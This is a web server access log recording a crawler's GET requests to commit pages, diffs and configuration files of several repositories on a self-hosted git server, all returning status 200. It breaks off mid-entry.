[Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom5.png" [Client 216.73.216.188] [Length 22725] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fpip" [Client 216.73.216.188] [Length 24102] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom4.png" [Client 216.73.216.188] [Length 22712] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 22017] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 62475] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.GlobalUsings.g.cs" [Client 216.73.216.188] [Length 21612] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom3.png" [Client 216.73.216.188] [Length 22726] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 11294] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 62477] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fpyvenv.cfg" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg?display=source" [Client 216.73.216.188] [Length 11478] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 216.73.216.188] [Length 11951] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 216.73.216.188] [Length 11956] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fmail_contact.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md?display=source" [Client 216.73.216.188] [Length 13627] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fpyvenv.cfg" [Client 216.73.216.188] [Length 23977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.TemporaryDocument%2Fassetpilot.ico" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 216.73.216.188] [Length 11917] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 216.73.216.188] [Length 11056] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 216.73.216.188] [Length 11952] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fpip3.12" [Client 216.73.216.188] [Length 24078] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Ffind%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11727] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2Fasset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom1.png" [Client 216.73.216.188] [Length 22770] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom6.png" [Client 216.73.216.188] [Length 22788] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 21715] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9895] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom5.png" [Client 216.73.216.188] [Length 22751] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 9840] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 216.73.216.188] [Length 11208] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md?display=rendered" [Client 216.73.216.188] [Length 12174] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 822] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt%2Frenewal%2Fnpm-7.conf" [Client 216.73.216.188] [Length 22360] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt%2Frenewal%2Fnpm-4.conf" [Client 216.73.216.188] [Length 22449] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 216.73.216.188] [Length 4444] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 216.73.216.188] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" [Client 216.73.216.188] [Length 9851] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2FDockerfile" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt%2Frenewal%2Fnpm-2.conf" [Client 216.73.216.188] [Length 22451] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 9847] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fuvicorn" [Client 216.73.216.188] [Length 24068] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2FBRIN+%EC%84%A4%EB%AA%85.md" [Client 216.73.216.188] [Length 26274] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 15588] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 22949] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" [Client 216.73.216.188] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 15588] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 